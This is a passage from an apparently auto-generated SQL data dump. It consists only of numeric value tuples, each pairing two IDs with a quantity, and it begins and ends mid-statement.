NULL,NULL),(326,194,NULL,10,NULL,NULL),(326,82,NULL,50,NULL,NULL),(326,86,NULL,50,NULL,NULL),(326,52,NULL,10,NULL,NULL),(326,62,NULL,15,NULL,NULL),(326,90,NULL,7,NULL,NULL),(326,87,NULL,20,NULL,NULL),(326,157,NULL,3,NULL,NULL),(326,2,NULL,5,NULL,NULL),(326,165,NULL,10,NULL,NULL),(326,22,NULL,10,NULL,NULL),(326,155,NULL,2,NULL,NULL),(326,130,NULL,5,NULL,NULL),(326,148,NULL,10,NULL,NULL),(220,5,NULL,10,NULL,NULL),(220,206,NULL,10,NULL,NULL),(220,209,NULL,10,NULL,NULL),(270,50,NULL,10,NULL,NULL),(270,91,NULL,15,NULL,NULL),(270,74,NULL,20,NULL,NULL),(270,52,NULL,10,NULL,NULL),(270,82,NULL,10,NULL,NULL),(270,103,NULL,5,NULL,NULL),(270,148,NULL,7,NULL,NULL),(270,93,NULL,40,NULL,NULL),(270,96,NULL,5,NULL,NULL),(270,115,NULL,5,NULL,NULL),(270,137,NULL,8,NULL,NULL),(327,161,NULL,20,NULL,NULL),(327,50,NULL,30,NULL,NULL),(327,23,NULL,15,NULL,NULL),(327,82,NULL,30,NULL,NULL),(327,86,NULL,30,NULL,NULL),(327,212,NULL,5,NULL,NULL),(327,171,NULL,5,NULL,NULL),(327,165,NULL,8,NULL,NULL),(327,52,NULL,10,NULL,NULL),(327,87,NULL,20,NULL,NULL),(327,148,NULL,8,NULL,NULL),(284,91,NULL,20,NULL,NULL),(284,82,NULL,50,NULL,NULL),(284,87,NULL,20,NULL,NULL),(284,52,NULL,10,NULL,NULL),(284,17,NULL,3,NULL,NULL),(284,171,NULL,10,NULL,NULL),(284,84,NULL,5,NULL,NULL),(284,108,NULL,24,NULL,NULL),(284,148,NULL,5,NULL,NULL),(284,157,NULL,5,NULL,NULL),(284,22,NULL,10,NULL,NULL),(153,206,NULL,10,NULL,NULL),(153,201,NULL,25,NULL,NULL),(153,209,NULL,7,NULL,NULL),(153,122,NULL,10,NULL,NULL),(134,135,NULL,20,NULL,NULL),(134,123,NULL,30,NULL,NULL),(134,206,NULL,20,NULL,NULL),(278,93,NULL,35,NULL,NULL),(278,50,NULL,20,NULL,NULL),(278,23,NULL,10,NULL,NULL),(278,21,NULL,5,NULL,NULL),(278,104,NULL,10,NULL,NULL),(278,148,NULL,10,NULL,NULL),(278,96,NULL,5,NULL,NULL),(278,111,NULL,5,NULL,NULL),(278,94,NULL,2,NULL,NULL),(222,52,NULL,20,NULL,NULL),(222,171,NULL,5,NULL,NULL),(222,157,NULL,5,NULL,NULL),(222,103,NULL,5,NULL,NULL),(222,91,NULL,10,NULL,NULL),(222,148,NULL,5,NULL,NULL),(227,131,NULL,20,NULL,NULL),(227,132,NULL,10,NULL,NULL),(227,207,NULL,10,NULL,NULL),(227,105,NULL,10,NULL,NULL),(227,55,NULL,15,NULL,NULL),(227,113,NULL,10,NULL,NULL),(227,148,NULL,5,NULL,NULL),(227,91,NULL,5,NULL,NULL),(227,52,NULL,5,NULL,NULL),(276,52,NULL,3,NULL,NULL),(276,99,NULL,5,NULL,NULL),(276,157,NULL,7,NULL,NULL),(276,212,NULL,10,NULL,NULL),(276,50,NULL,30,NULL,NULL),(276,86,NULL,15,NULL,NULL),(276,21,NULL,10,NULL,NULL),(276,165,NULL,5,NULL,NULL),(276,148,NULL,10,NULL,NULL),(276,115,NULL,7,NULL,NULL),(276,87,NULL,10,NULL,NULL),(328,101,NULL,120,NULL,NULL),(328,207,NULL,2,NULL,NULL),(328,183,NULL,5,NULL,NULL),(328,91,NULL,7,NULL,NULL),(328,209,NULL,10,NULL,NULL),(328,201,NULL,10,NULL,NULL),(328,131,NULL,10,NULL,NULL),(328,132,NULL,10,NULL,NULL),(328,109,NULL,25,NULL,NULL),(281,52,NULL,10,NULL,NULL),(281,103,NULL,7,NULL,NULL),(281,82,NULL,20,NULL,NULL),(281,194,NULL,15,NULL,NULL),(281,157,NULL,10,NULL,NULL),(281,156,NULL,5,NULL,NULL),(281,137,NULL,10,NULL,NULL),(281,91,NULL,15,NULL,NULL),(290,209,NULL,10,NULL,NULL),(290,109,NULL,50,NULL,NULL),(290,201,NULL,25,NULL,NULL),(47,74,NULL,50,NULL,NULL),(47,82,NULL,35,NULL,NULL),(47,50,NULL,10,NULL,NULL),(47,52,NULL,10,NULL,NULL),(47,102,NULL,30,NULL,NULL),(47,120,NULL,10,NULL,NULL),(47,213,NULL,20,NULL,NULL),(47,59,NULL,50,NULL,NULL),(47,77,NULL,20,NULL,NULL),(47,22,NULL,50,NULL,NULL),(17,101,NULL,40,NULL,NULL),(17,148,NULL,1,NULL,NULL),(17,108,NULL,48,NULL,NULL),(274,52,NULL,10,NULL,NULL),(274,82,NULL,50,NULL,NULL),(274,194,NULL,15,NULL,NULL),(274,174,NULL,10,NULL,NULL),(274,148,NULL,7,NULL,NULL),(274,202,NULL,30,NULL,NULL),(265,52,NULL,10,NULL,NULL),(265,152,NULL,70,NULL,NULL),(265,130,NULL,15,NULL,NULL),(265,157,NULL,5,NULL,NULL),(265,74,NULL,30,NULL,NULL),(265,91,NULL,20,NULL,NULL),(265,82,NULL,10,NULL,NULL),(265,148,NULL,5,NULL,NULL),(264,171,NULL,5,NULL,NULL),(264,148,NULL,10,NULL,NULL),(264,52,NULL,10,NULL,NULL),(264,50,NULL,15,NULL,NULL),(264,82,NULL,25,NULL,NULL),(264,93,NULL,20,NULL,NULL),(264,103,NULL,5,NULL,NULL),(264,92,NULL,10,NULL,NULL),(288,197,NULL,30,NULL,NULL),(288,94,NULL,7,NULL,NULL),(288,5,NULL,7,NULL,NULL),(288,39,NULL,25,NULL,NULL),(288,19,NULL,60,NULL,NULL),(288,117,NULL,3,NULL,NULL),(288,221,NULL,320,NULL,NULL),(204,95,NULL,130,NULL,NULL),(204,183,NULL,5,NULL,NULL),(204,130,NULL,10,NULL,NULL),(204,111,NULL,5,NULL,NULL),(204,155,NULL,3,NULL,NULL),(204,137,NULL,10,NULL,NULL),(204,52,NULL,15,NULL,NULL),(204,102,NULL,10,NULL,NULL),(204,82,NULL,20,NULL,NULL),(329,91,NULL,20,NULL,NULL),(329,82,NULL,30,NULL,NULL),(329,86,NULL,50,NULL,NULL),(329,109,NULL,50,NULL,NULL),(329,133,NULL,30,NULL,NULL),(329,87,NULL,15,NULL,NULL),(329,101,NULL,40,NULL,NULL),(329,155,NULL,5,NULL,NULL),(329,112,NULL,3,NULL,NULL),(329,59,NULL,15,NULL,NULL),(329,88,NULL,3,NULL,NULL),(329,165,NULL,5,NULL,NULL),(330,82,NULL,30,NULL,NULL),(330,86,NULL,50,NULL,NULL),(330,87,NULL,20,NULL,NULL),(330,90,NULL,20,NULL,NULL),(330,165,NULL,3,NULL,NULL),(330,183,NULL,5,NULL,NULL),(330,108,NULL,30,NULL,NULL),(330,88,NULL,3,NULL,NULL),(330,112,NULL,3,NULL,NULL),(331,101,NULL,80,NULL,NULL),(331,108,NULL,90,NULL,NULL),(331,87,NULL,15,NULL,NULL),(331,50,NULL,10,NULL,NULL),(331,86,NULL,15,NULL,NULL),(331,74,NULL,15,NULL,NULL),(331,100,NULL,10,NULL,NULL),(331,148,NULL,5,NULL,NULL),(331,17,NULL,3,NULL,NULL),(331,182,NULL,10,NULL,NULL),(332,101,NULL,120,NULL,NULL),(333,101,NULL,50,NULL,NULL),(334,108,NULL,70,NULL,NULL),(335,121,NULL,75,NULL,NULL),(335,101,NULL,60,NULL,NULL),(335,91,NULL,10,NULL,NULL),(335,87,NULL,5,NULL,NULL),(335,111,NULL,5,NULL,NULL),(335,117,NULL,2,NULL,NULL),(335,52,NULL,4,NULL,NULL),(335,82,NULL,10,NULL,NULL),(336,67,NULL,50,NULL,NULL),(336,61,NULL,10,NULL,NULL),(336,19,NULL,100,NULL,NULL),(336,39,NULL,10,NULL,NULL),(336,94,NULL,5,NULL,NULL),(336,174,NULL,20,NULL,NULL),(336,123,NULL,10,NULL,NULL),(336,221,NULL,200,NULL,NULL),(336,175,NULL,1,NULL,NULL),(336,128,NULL,10,NULL,NULL),(336,5,NULL,5,NULL,NULL),(337,42,NULL,40,NULL,NULL),(337,67,NULL,30,NULL,NULL),(337,37,NULL,15,NULL,NULL),(337,39,NULL,30,NULL,NULL),(337,31,NULL,40,NULL,NULL),(337,30,NULL,40,NULL,NULL),(337,61,NULL,25,NULL,NULL),(337,19,NULL,50,NULL,NULL),(337,94,NULL,10,NULL,NULL),(337,200,NULL,20,NULL,NULL),(338,152,NULL,75,NULL,NULL),(338,101,NULL,70,NULL,NULL),(338,74,NULL,25,NULL,NULL),(338,91,NULL,20,NULL,NULL),(338,50,NULL,25,NULL,NULL),(338,100,NULL,8,NULL,NULL),(338,37,NULL,20,NULL,NULL),(338,111,NULL,5,NULL,NULL),(338,130,NULL,10,NULL,NULL),(338,148,NULL,5,NULL,NULL),(339,101,NULL,70,NULL,NULL),(339,109,NULL,50,NULL,NULL),(339,91,NULL,25,NULL,NULL),(339,74,NULL,30,NULL,NULL),(339,50,NULL,25,NULL,NULL),(339,52,NULL,10,NULL,NULL),(339,148,NULL,7,NULL,NULL),(340,203,NULL,40,NULL,NULL),(341,101,NULL,150,NULL,NULL),(342,101,NULL,100,NULL,NULL),(340,92,NULL,50,NULL,NULL),(340,82,NULL,30,NULL,NULL),(340,86,NULL,25,NULL,NULL),(340,52,NULL,15,NULL,NULL),(340,171,NULL,3,NULL,NULL),(340,103,NULL,5,NULL,NULL),(340,157,NULL,3,NULL,NULL),(340,148,NULL,7,NULL,NULL),(343,92,NULL,40,NULL,NULL),(343,82,NULL,25,NULL,NULL),(343,86,NULL,30,NULL,NULL),(343,20,NULL,30,NULL,NULL),(343,50,NULL,20,NULL,NULL),(343,157,NULL,3,NULL,NULL),(343,171,NULL,3,NULL,NULL),(343,103,NULL,5,NULL,NULL),(343,194,NULL,30,NULL,NULL),(343,200,NULL,30,NULL,NULL),(343,104,NULL,5,NULL,NULL),(343,94,NULL,5,NULL,NULL),(332,161,NULL,60,NULL,NULL),(332,123,NULL,20,NULL,NULL),(332,91,NULL,10,NULL,NULL),(332,90,NULL,7,NULL,NULL),(332,55,NULL,3,NULL,NULL),(332,99,NULL,3,NULL,NULL),(332,88,NULL,3,NULL,NULL),(332,112,NULL,3,NULL,NULL),(332,156,NULL,3,NULL,NULL),(332,134,NULL,3,NULL,NULL),(344,101,NULL,120,NULL,NULL),(345,101,NULL,130,NULL,NULL),(346,101,NULL,120,NULL,NULL),(346,91,NULL,10,NULL,NULL),(346,90,NULL,15,NULL,NULL),(346,17,NULL,5,NULL,NULL),(346,112,NULL,3,NULL,NULL),(346,88,NULL,5,NULL,NULL),(346,150,NULL,10,NULL,NULL),(346,96,NULL,5,NULL,NULL),(346,104,NULL,5,NULL,NULL),(346,148,NULL,10,NULL,NULL),(346,93,NULL,40,NULL,NULL),(346,86,NULL,10,NULL,NULL),(346,50,NULL,10,NULL,NULL),(346,109,NULL,20,NULL,NULL),(347,101,NULL,220,NULL,NULL),(347,17,NULL,20,NULL,NULL),(347,88,NULL,3,NULL,NULL),(347,112,NULL,3,NULL,NULL),(347,123,NULL,25,NULL,NULL),(347,77,NULL,15,NULL,NULL),(347,99,NULL,5,NULL,NULL),(347,93,NULL,40,NULL,NULL),(347,74,NULL,10,NULL,NULL),(347,91,NULL,10,NULL,NULL),(347,50,NULL,25,NULL,NULL),(347,214,NULL,20,NULL,NULL),(347,59,NULL,20,NULL,NULL),(347,109,NULL,15,NULL,NULL),(347,89,NULL,3,NULL,NULL),(347,180,NULL,10,NULL,NULL),(344,135,NULL,10,NULL,NULL),(344,91,NULL,10,NULL,NULL),(344,90,NULL,20,NULL,NULL),(344,148,NULL,10,NULL,NULL),(344,112,NULL,3,NULL,NULL),(344,88,NULL,3,NULL,NULL),(344,17,NULL,5,NULL,NULL),(344,93,NULL,40,NULL,NULL),(344,50,NULL,10,NULL,NULL),(344,109,NULL,20,NULL,NULL),(344,74,NULL,10,NULL,NULL),(345,135,NULL,15,NULL,NULL),(345,117,NULL,5,NULL,NULL),(345,111,NULL,5,NULL,NULL),(345,96,NULL,5,NULL,NULL),(345,187,NULL,5,NULL,NULL),(345,91,NULL,15,NULL,NULL),(345,112,NULL,3,NULL,NULL),(345,88,NULL,3,NULL,NULL),(348,101,NULL,120,NULL,NULL),(348,93,NULL,40,NULL,NULL),(348,91,NULL,30,NULL,NULL),(348,50,NULL,40,NULL,NULL),(348,59,NULL,30,NULL,NULL),(348,171,NULL,5,NULL,NULL),(348,103,NULL,5,NULL,NULL),(348,157,NULL,5,NULL,NULL),(348,216,NULL,2,NULL,NULL),(348,165,NULL,10,NULL,NULL),(348,69,NULL,5,NULL,NULL),(348,148,NULL,10,NULL,NULL),(349,101,NULL,120,NULL,NULL),(349,82,NULL,100,NULL,NULL),(349,194,NULL,40,NULL,NULL),(349,52,NULL,50,NULL,NULL),(349,157,NULL,5,NULL,NULL),(349,91,NULL,20,NULL,NULL),(349,202,NULL,45,NULL,NULL),(349,105,NULL,10,NULL,NULL),(350,101,NULL,120,NULL,NULL),(350,88,NULL,5,NULL,NULL),(350,52,NULL,10,NULL,NULL),(350,50,NULL,410,NULL,NULL),(350,59,NULL,40,NULL,NULL),(350,214,NULL,40,NULL,NULL),(350,176,NULL,4,NULL,NULL),(350,148,NULL,7,NULL,NULL),(350,55,NULL,15,NULL,NULL),(350,96,NULL,3,NULL,NULL),(351,101,NULL,100,NULL,NULL),(352,211,NULL,180,NULL,NULL),(353,101,NULL,170,NULL,NULL),(354,101,NULL,100,NULL,NULL),(354,194,NULL,40,NULL,NULL),(354,116,NULL,10,NULL,NULL),(354,227,NULL,15,NULL,NULL),(354,202,NULL,45,NULL,NULL),(354,148,NULL,10,NULL,NULL),(355,101,NULL,70,NULL,NULL),(356,101,NULL,100,NULL,NULL),(356,82,NULL,40,NULL,NULL),(356,52,NULL,25,NULL,NULL),(356,202,NULL,45,NULL,NULL),(356,116,NULL,5,NULL,NULL),(356,69,NULL,5,NULL,NULL),(356,157,NULL,5,NULL,NULL),(356,74,NULL,25,NULL,NULL),(356,87,NULL,5,NULL,NULL),(356,148,NULL,10,NULL,NULL),(357,101,NULL,120,NULL,NULL),(357,87,NULL,20,NULL,NULL),(357,82,NULL,20,NULL,NULL),(357,130,NULL,10,NULL,NULL),(357,155,NULL,3,NULL,NULL),(357,108,NULL,20,NULL,NULL),(357,74,NULL,20,NULL,NULL),(357,148,NULL,8,NULL,NULL),(358,101,NULL,90,NULL,NULL),(358,92,NULL,20,NULL,NULL),(358,205,NULL,15,NULL,NULL),(358,157,NULL,10,NULL,NULL),(358,52,NULL,8,NULL,NULL),(358,82,NULL,30,NULL,NULL),(358,135,NULL,25,NULL,NULL),(358,119,NULL,3,NULL,NULL),(358,106,NULL,7,NULL,NULL),(358,202,NULL,15,NULL,NULL),(358,200,NULL,30,NULL,NULL),(358,105,NULL,7,NULL,NULL),(359,101,NULL,150,NULL,NULL),(360,101,NULL,150,NULL,NULL),(359,121,NULL,45,NULL,NULL),(359,87,NULL,10,NULL,NULL),(359,52,NULL,10,NULL,NULL),(359,91,NULL,10,NULL,NULL),(359,112,NULL,3,NULL,NULL),(359,88,NULL,3,NULL,NULL),(359,111,NULL,5,NULL,NULL),(359,187,NULL,5,NULL,NULL),(360,121,NULL,45,NULL,NULL),(360,87,NULL,10,NULL,NULL),(360,182,NULL,15,NULL,NULL),(360,112,NULL,3,NULL,NULL),(360,88,NULL,3,NULL,NULL),(360,183,NULL,5,NULL,NULL),(361,101,NULL,300,NULL,NULL),(361,121,NULL,50,NULL,NULL),(361,155,NULL,8,NULL,NULL),(361,137,NULL,8,NULL,NULL),(361,74,NULL,9,NULL,NULL),(361,131,NULL,8,NULL,NULL),(362,95,NULL,170,NULL,NULL),(362,121,NULL,50,NULL,NULL),(362,130,NULL,8,NULL,NULL),(362,155,NULL,5,NULL,NULL),(362,137,NULL,8,NULL,NULL),(362,74,NULL,6,NULL,NULL),(362,131,NULL,10,NULL,NULL),(362,52,NULL,8,NULL,NULL),(363,101,NULL,80,NULL,NULL),(363,108,NULL,90,NULL,NULL),(363,87,NULL,5,NULL,NULL),(363,132,NULL,6,NULL,NULL),(363,86,NULL,5,NULL,NULL),(363,82,NULL,5,NULL,NULL),(363,109,NULL,30,NULL,NULL),(363,148,NULL,5,NULL,NULL),(363,112,NULL,3,NULL,NULL),(363,88,NULL,3,NULL,NULL),(363,187,NULL,5,NULL,NULL),(363,182,NULL,5,NULL,NULL),(364,101,NULL,80,NULL,NULL),(364,148,NULL,4,NULL,NULL),(364,131,NULL,10,NULL,NULL),(364,91,NULL,10,NULL,NULL),(364,17,NULL,3,NULL,NULL),(364,50,NULL,8,NULL,NULL),(364,86,NULL,10,NULL,NULL),(364,74,NULL,10,NULL,NULL),(364,112,NULL,3,NULL,NULL),(364,183,NULL,3,NULL,NULL),(364,88,NULL,3,NULL,NULL),(364,108,NULL,60,NULL,NULL),(365,101,NULL,200,NULL,NULL),(365,82,NULL,15,NULL,NULL),(365,91,NULL,20,NULL,NULL),(365,52,NULL,10,NULL,NULL),(365,112,NULL,3,NULL,NULL),(365,88,NULL,3,NULL,NULL),(365,100,NULL,20,NULL,NULL),(365,17,NULL,5,NULL,NULL),(365,103,NULL,5,NULL,NULL),(365,73,NULL,5,NULL,NULL),(365,187,NULL,10,NULL,NULL),(365,93,NULL,40,NULL,NULL),(366,106,NULL,50,NULL,NULL),(366,74,NULL,50,NULL,NULL),(366,91,NULL,40,NULL,NULL),(366,90,NULL,20,NULL,NULL),(366,50,NULL,20,NULL,NULL),(366,96,NULL,10,NULL,NULL),(366,111,NULL,10,NULL,NULL),(366,137,NULL,10,NULL,NULL),(366,148,NULL,5,NULL,NULL),(367,161,NULL,50,NULL,NULL),(367,82,NULL,20,NULL,NULL),(367,50,NULL,30,NULL,NULL),(367,91,NULL,30,NULL,NULL),(367,74,NULL,30,NULL,NULL),(367,112,NULL,3,NULL,NULL),(367,88,NULL,3,NULL,NULL),(367,90,NULL,20,NULL,NULL),(367,148,NULL,5,NULL,NULL),(368,101,NULL,220,NULL,NULL),(368,148,NULL,10,NULL,NULL),(368,123,NULL,25,NULL,NULL),(368,89,NULL,5,NULL,NULL),(368,112,NULL,5,NULL,NULL),(368,93,NULL,40,NULL,NULL),(368,50,NULL,15,NULL,NULL),(368,91,NULL,15,NULL,NULL),(368,59,NULL,15,NULL,NULL),(368,193,NULL,15,NULL,NULL),(368,88,NULL,3,NULL,NULL),(369,101,NULL,220,NULL,NULL),(370,101,NULL,90,NULL,NULL),(371,101,NULL,70,NULL,NULL),(371,108,NULL,75,NULL,NULL),(371,52,NULL,15,NULL,NULL),(371,91,NULL,15,NULL,NULL),(371,74,NULL,20,NULL,NULL),(371,130,NULL,10,NULL,NULL),(371,111,NULL,3,NULL,NULL),(371,157,NULL,3,NULL,NULL),(371,171,NULL,3,NULL,NULL),(371,87,NULL,15,NULL,NULL),(371,148,NULL,5,NULL,NULL),(371,137,NULL,5,NULL,NULL),(372,101,NULL,90,NULL,NULL),(373,101,NULL,220,NULL,NULL),(373,93,NULL,45,NULL,NULL),(373,91,NULL,20,NULL,NULL),(373,50,NULL,20,NULL,NULL),(373,90,NULL,15,NULL,NULL),(373,59,NULL,15,NULL,NULL),(373,214,NULL,20,NULL,NULL),(373,100,NULL,25,NULL,NULL),(373,112,NULL,5,NULL,NULL),(373,88,NULL,5,NULL,NULL),(373,137,NULL,10,NULL,NULL),(373,148,NULL,8,NULL,NULL),(373,17,NULL,7,NULL,NULL),(369,148,NULL,10,NULL,NULL),(369,93,NULL,40,NULL,NULL),(369,50,NULL,20,NULL,NULL),(369,193,NULL,20,NULL,NULL),(369,91,NULL,20,NULL,NULL),(369,59,NULL,20,NULL,NULL),(369,112,NULL,5,NULL,NULL),(369,123,NULL,25,NULL,NULL),(369,88,NULL,3,NULL,NULL),(369,55,NULL,7,NULL,NULL),(369,89,NULL,3,NULL,NULL),(369,134,NULL,5,NULL,NULL),(369,17,NULL,3,NULL,NULL),(369,132,NULL,10,NULL,NULL),(370,202,NULL,45,NULL,NULL),(370,52,NULL,15,NULL,NULL),(370,91,NULL,20,NULL,NULL),(370,82,NULL,25,NULL,NULL),(370,87,NULL,10,NULL,NULL),(370,74,NULL,20,NULL,NULL),(370,157,NULL,5,NULL,NULL),(370,100,NULL,7,NULL,NULL),(370,69,NULL,10,NULL,NULL),(370,148,NULL,7,NULL,NULL),(334,109,NULL,50,NULL,NULL),(334,94,NULL,8,NULL,NULL),(334,198,NULL,2,NULL,NULL),(334,148,NULL,3,NULL,NULL),(334,174,NULL,7,NULL,NULL),(334,112,NULL,1,NULL,NULL),(355,154,NULL,75,NULL,NULL),(355,82,NULL,25,NULL,NULL),(355,52,NULL,20,NULL,NULL),(355,55,NULL,15,NULL,NULL),(355,130,NULL,10,NULL,NULL),(355,155,NULL,3,NULL,NULL),(355,192,NULL,4,NULL,NULL),(355,148,NULL,10,NULL,NULL),(86,121,NULL,45,NULL,NULL),(86,91,NULL,10,NULL,NULL),(86,52,NULL,10,NULL,NULL),(86,55,NULL,8,NULL,NULL),(86,165,NULL,10,NULL,NULL),(86,148,NULL,5,NULL,NULL),(86,113,NULL,15,NULL,NULL),(86,132,NULL,15,NULL,NULL),(324,148,NULL,5,NULL,NULL),(324,196,NULL,20,NULL,NULL),(324,123,NULL,10,NULL,NULL),(324,131,NULL,15,NULL,NULL),(324,132,NULL,15,NULL,NULL),(375,101,NULL,100,NULL,NULL),(375,103,NULL,5,NULL,NULL),(375,52,NULL,5,NULL,NULL),(375,157,NULL,3,NULL,NULL),(375,171,NULL,2,NULL,NULL),(375,131,NULL,20,NULL,NULL),(375,132,NULL,15,NULL,NULL),(375,148,NULL,5,NULL,NULL),(138,215,NULL,10,NULL,NULL),(138,123,NULL,20,NULL,NULL),(138,148,NULL,10,NULL,NULL),(137,52,NULL,10,NULL,NULL),(137,50,NULL,10,NULL,NULL),(137,74,NULL,20,NULL,NULL),(137,109,NULL,100,NULL,NULL),(137,131,NULL,20,NULL,NULL),(137,206,NULL,10,NULL,NULL),(299,135,NULL,10,NULL,NULL),(299,82,NULL,15,NULL,NULL),(299,123,NULL,20,NULL,NULL),(299,109,NULL,50,NULL,NULL),(299,132,NULL,20,NULL,NULL),(299,131,NULL,20,NULL,NULL),(299,214,NULL,100,NULL,NULL),(299,206,NULL,10,NULL,NULL),(310,123,NULL,40,NULL,NULL),(310,206,NULL,15,NULL,NULL),(310,77,NULL,40,NULL,NULL),(310,82,NULL,20,NULL,NULL),(310,132,NULL,20,NULL,NULL),(186,148,NULL,5,NULL,NULL),(186,93,NULL,40,NULL,NULL),(186,109,NULL,30,NULL,NULL),(186,135,NULL,50,NULL,NULL),(186,112,NULL,3,NULL,NULL),(186,88,NULL,3,NULL,NULL),(186,216,NULL,3,NULL,NULL),(186,17,NULL,4,NULL,NULL),(186,116,NULL,3,NULL,NULL),(186,123,NULL,10,NULL,NULL),(186,131,NULL,10,NULL,NULL),(294,161,NULL,60,NULL,NULL),(294,148,NULL,12,NULL,NULL),(294,135,NULL,15,NULL,NULL),(294,187,NULL,10,NULL,NULL),(294,88,NULL,3,NULL,NULL),(294,112,NULL,3,NULL,NULL),(325,88,NULL,3,NULL,NULL),(325,52,NULL,30,NULL,NULL),(325,91,NULL,30,NULL,NULL),(325,93,NULL,40,NULL,NULL),(325,194,NULL,40,NULL,NULL),(325,148,NULL,10,NULL,NULL),(123,52,NULL,5,NULL,NULL),(123,82,NULL,10,NULL,NULL),(123,103,NULL,2,NULL,NULL),(123,91,NULL,5,NULL,NULL),(123,157,NULL,5,NULL,NULL),(123,148,NULL,10,NULL,NULL),(66,52,NULL,20,NULL,NULL),(66,101,NULL,140,NULL,NULL),(66,157,NULL,5,NULL,NULL),(66,103,NULL,5,NULL,NULL),(66,82,NULL,30,NULL,NULL),(66,194,NULL,20,NULL,NULL),(66,171,NULL,3,NULL,NULL),(66,148,NULL,10,NULL,NULL),(308,17,NULL,20,NULL,NULL),(308,189,NULL,4,NULL,NULL),(308,206,NULL,20,NULL,NULL),(308,99,NULL,3,NULL,NULL),(308,131,NULL,15,NULL,NULL),(308,132,NULL,15,NULL,NULL),(372,128,NULL,50,NULL,NULL),(372,205,NULL,25,NULL,NULL),(372,171,NULL,5,NULL,NULL),(372,52,NULL,15,NULL,NULL),(372,17,NULL,5,NULL,NULL),(372,69,NULL,15,NULL,NULL),(372,148,NULL,10,NULL,NULL),(376,214,NULL,15,NULL,NULL),(376,50,NULL,15,NULL,NULL),(376,86,NULL,15,NULL,NULL),(377,101,NULL,100,NULL,NULL),(378,101,NULL,160,NULL,NULL),(379,101,NULL,120,NULL,NULL),(379,203,NULL,30,NULL,NULL),(379,21,NULL,20,NULL,NULL),(379,77,NULL,30,NULL,NULL),(379,82,NULL,50,NULL,NULL),(379,157,NULL,2,NULL,NULL),(379,69,NULL,5,NULL,NULL),(379,17,NULL,2,NULL,NULL),(379,183,NULL,5,NULL,NULL),(379,91,NULL,10,NULL,NULL),(379,135,NULL,8,NULL,NULL),(379,202,NULL,45,NULL,NULL),(379,148,NULL,10,NULL,NULL),(342,24,NULL,50,NULL,NULL),(342,205,NULL,30,NULL,NULL),(342,157,NULL,5,NULL,NULL),(342,103,NULL,5,NULL,NULL),(342,109,NULL,20,NULL,NULL),(342,148,NULL,10,NULL,NULL),(342,194,NULL,15,NULL,NULL),(342,52,NULL,5,NULL,NULL),(342,171,NULL,2,NULL,NULL),(342,121,NULL,30,NULL,NULL),(380,101,NULL,110,NULL,NULL),(374,101,NULL,160,NULL,NULL),(269,52,NULL,7,NULL,NULL),(269,82,NULL,30,NULL,NULL),(269,157,NULL,5,NULL,NULL),(269,17,NULL,5,NULL,NULL),(269,148,NULL,2,NULL,NULL),(269,23,NULL,20,NULL,NULL),(381,101,NULL,80,NULL,NULL),(383,101,NULL,140,NULL,NULL),(92,109,NULL,50,NULL,NULL),(92,106,NULL,20,NULL,NULL),(92,101,NULL,140,NULL,NULL),(92,104,NULL,4,NULL,NULL),(92,137,NULL,25,NULL,NULL),(92,182,NULL,15,NULL,NULL),(92,82,NULL,15,NULL,NULL),(92,91,NULL,10,NULL,NULL),(92,52,NULL,10,NULL,NULL),(92,148,NULL,4,NULL,NULL),(383,93,NULL,20,NULL,NULL),(383,106,NULL,20,NULL,NULL),(383,82,NULL,15,NULL,NULL),(383,137,NULL,25,NULL,NULL),(383,182,NULL,15,NULL,NULL),(383,91,NULL,10,NULL,NULL),(383,52,NULL,10,NULL,NULL),(383,103,NULL,5,NULL,NULL),(383,109,NULL,50,NULL,NULL),(383,148,NULL,5,NULL,NULL),(33,101,NULL,120,NULL,NULL),(33,135,NULL,10,NULL,NULL),(33,117,NULL,4,NULL,NULL),(33,111,NULL,4,NULL,NULL),(33,151,NULL,4,NULL,NULL),(33,160,NULL,4,NULL,NULL),(33,6,NULL,4,NULL,NULL),(33,90,NULL,5,NULL,NULL),(385,213,NULL,50,NULL,NULL),(385,52,NULL,20,NULL,NULL),(385,82,NULL,35,NULL,NULL),(385,91,NULL,10,NULL,NULL),(385,135,NULL,7,NULL,NULL),(385,103,NULL,5,NULL,NULL),(385,123,NULL,4,NULL,NULL),(385,202,NULL,70,NULL,NULL),(385,148,NULL,6,NULL,NULL),(386,91,NULL,30,NULL,NULL),(386,82,NULL,30,NULL,NULL),(386,50,NULL,30,NULL,NULL),(386,74,NULL,30,NULL,NULL),(386,75,NULL,30,NULL,NULL),(386,23,NULL,20,NULL,NULL),(386,20,NULL,30,NULL,NULL),(386,196,NULL,20,NULL,NULL),(386,52,NULL,10,NULL,NULL),(386,116,NULL,5,NULL,NULL),(386,93,NULL,50,NULL,NULL),(386,148,NULL,10,NULL,NULL),(387,106,NULL,50,NULL,NULL),(387,93,NULL,50,NULL,NULL),(387,130,NULL,5,NULL,NULL),(387,136,NULL,5,NULL,NULL),(387,137,NULL,10,NULL,NULL),(387,91,NULL,20,NULL,NULL),(387,82,NULL,20,NULL,NULL),(387,52,NULL,10,NULL,NULL),(387,50,NULL,15,NULL,NULL),(387,21,NULL,5,NULL,NULL),(387,55,NULL,5,NULL,NULL),(387,148,NULL,10,NULL,NULL),(388,75,NULL,200,NULL,NULL),(388,91,NULL,30,NULL,NULL),(388,52,NULL,20,NULL,NULL),(388,90,NULL,10,NULL,NULL),(388,82,NULL,20,NULL,NULL),(388,50,NULL,20,NULL,NULL),(388,93,NULL,50,NULL,NULL),(388,115,NULL,5,NULL,NULL),(388,151,NULL,3,NULL,NULL),(388,137,NULL,10,NULL,NULL),(388,157,NULL,2,NULL,NULL),(388,148,NULL,15,NULL,NULL),(389,20,NULL,50,NULL,NULL),(389,91,NULL,20,NULL,NULL),(389,23,NULL,20,NULL,NULL),(389,21,NULL,20,NULL,NULL),(389,52,NULL,20,NULL,NULL),(389,50,NULL,20,NULL,NULL),(389,5,NULL,6,NULL,NULL),(389,123,NULL,5,NULL,NULL),(389,103,NULL,2,NULL,NULL),(389,119,NULL,2,NULL,NULL),(389,202,NULL,45,NULL,NULL),(389,148,NULL,5,NULL,NULL),(389,194,NULL,30,NULL,NULL),(390,91,NULL,50,NULL,NULL),(390,52,NULL,50,NULL,NULL),(390,50,NULL,50,NULL,NULL),(390,82,NULL,50,NULL,NULL),(390,76,NULL,50,NULL,NULL),(390,214,NULL,50,NULL,NULL),(390,108,NULL,45,NULL,NULL),(390,148,NULL,6,NULL,NULL),(390,194,NULL,50,NULL,NULL),(300,91,NULL,10,NULL,NULL),(300,87,NULL,25,NULL,NULL),(300,132,NULL,15,NULL,NULL),(300,131,NULL,15,NULL,NULL),(300,123,NULL,20,NULL,NULL),(